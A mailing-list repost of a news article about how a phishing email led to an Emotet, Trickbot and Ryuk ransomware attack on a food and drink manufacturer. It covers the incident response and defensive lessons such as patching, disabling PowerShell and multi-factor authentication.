[BreachExchange] Ransomware: How clicking on one email left a whole business in big trouble

[Destry Winant]

https://www.zdnet.com/article/ransomware-how-clicking-on-one-phishing-email-left-a-whole-business-in-big-trouble/

 Security experts have given an insight into how a targeted ransomware
attack took down the network of a food and drink manufacturer after
hackers took advantage of common security vulnerabilities.

The crooks used a phishing attack and took advantage of a number of
vulnerabilities – from old hardware to default passwords – to first
deploy Emotet and Trickbot malware before delivering the Ryuk
ransomware and attempting to extort a fee from the victim to restore
the network.

Microsoft to apply California's privacy law for all US users
Mind-reading technology: The security and privacy threats ahead
How to replace each Google service with a more privacy-friendly alternative
Cyber security 101: Protect your privacy from hackers, spies, and the government

In this case, the organisation didn't opt to pay the ransom –
something that authorities discourage and would only fund additional
attacks by cyber criminals – but instead had security experts come in
to examine the network and restore functionality within 48 hours.

"This was a targeted attack. This is targeting organisations such as
this one which, if they don't have the security retainer or IT staff,
the initial reaction would be to give into the ransomware attack
because they want to return their operations quickly," Bindu
Sundaresan, director at AT&T cybersecurity, told ZDNet.

AT&T investigated the attack and helped the unnamed manufacturer get
back online without giving into a ransom demand while also
experiencing the least amount of disruption to production as possible.
But the company likely would not have fallen victim if basic security
vulnerabilities hadn't allowed the initial stages of the attack to
happen.

Ryuk, like some other forms of ransomware, is deployed as the final
stage in a three-pronged attack that also delivers Emotet and
Trickbot. Emotet started life as a banking trojan before evolving into
a botnet that is leased out to deliver other malware, which in this
case is the Trickbot trojan.

Get multiple layers of protection for your Cyber Safety. Don’t wait!
Multi-layered, advanced security helps protect your private and
financial information when you go online.
Sponsored by Norton LifeLock

Trickbot is a powerful form of malware that provides attackers with a
full backdoor into compromised systems, including the ability to move
around networks, issue commands and steal additional data.

After this the Ryuk ransomware is downloaded onto the network by the
hackers because cyber criminals view it as the quickest and easiest
way to make money from a compromised network.

While many ransomware campaigns now start with targeting remote ports,
this one began with a phishing attack.

"A user was sent a Microsoft Word document as part of a phishing
campaign. It was labelled as an invoice and this user downloaded the
document, then malicious code executed a PowerShell command that
downloaded an Emotet payload," Sundaresan explained.

PowerShell commands generally aren't required by users who don't need
administrator rights, so if PowerShell had been disabled for those who
don't need it, the cyberattack could've been cut off at this point.

After Emotet formed the initial part of the attack, gaining a foothold
in the network the next step was to use the Trickbot malware to steal
login credentials for corporate accounts and cloud services to gain
access to other parts of the network.

By exploiting this cycle, cyber criminals were able to gain control of
over half the network, before eventually delivering the Ryuk
ransomware.

"Malware like this wants to get the most bang for its buck and go
after organisations that are at the point where they feel like they
need to give in due to the damage it's costing to their network, the
valuable data that's being held – so they have a sense of urgency,"
said Sundaresan.

However, the attack could have been much worse, given Ryuk had not
compromised the entire network but about 60% of it, including ordering
and billing applications. This was in part because security personnel
were about to contain the attack after being called in by the
manufacturer.

"The ability to contain it and the response time was crucial. The
ability to contain the incident is the key to recover from it and
having the business up and running before it got to the crucial
databases," Sundaresan explained.

Within 48 hours, much of the business was back up and running again –
crucially without having given into paying a ransom demand to
criminals. However, two days of downtime would have been costly to the
organisation and restoring the network isn't likely to have been cheap
either – plus there's the prospect of having to upgrade security in
the aftermath, so attackers don't strike again.

And like many organisations that fall victim to cyberattacks, this one
could've prevented itself from falling victim to ransomware by
ensuring that cybersecurity hygiene was well managed – but there were
simple-to-fix vulnerabilities that attackers were able to take
advantage of.

SEE: Ransomware: 11 steps you should take to protect against disaster

For example, the vulnerabilities that Emotet, Trickbot and Ryuk take
advantage of have been known about for a long time and critical
security updates have been issued to protect users – but despite these
updates being years old, there are organisations that still haven't
applied them.

"Microsoft has put out patches but patch management and security
hygiene still remain issues for organisations," said Sundaresan, who
added that this ransomware attack could've also been prevented if
strong passwords and multi-factor authentication had been used to
secure systems.

"A lot of this can be prevented. If they didn't have default password
and end-of-life machines, a lot of this would've been prevented."

And when it comes to cyberattacks, prevention is the best cure,
because not only does it stop your organisation from falling victim to
ransomware or other malware, the cost of securing the network in
advance is almost certainly going to be less expensive than having to
do it in the aftermath of an incident – especially if the attack
disrupts operations or causes reputational damage that could keep
customers away.

So while it might potentially seem expensive, it could be very much
worth having security experts from outside the organisation come in to
examine the network before damage can be done – and not after.

"Get a security assessment done from an offensive attacker point of
view, you don't want to be just doing the security initiatives from
compliance or internal testing – it's not enough. You have to get your
network tested using multiple attack vectors and you have to do it
objectively with full penetration testing," Sundaresan said.

Because ultimately, ransomware – be it Ryuk or another family – is
still out there and still remains a threat because too many
organisations aren't following the security basics. And until this is
fixed, ransomware will remain a problem.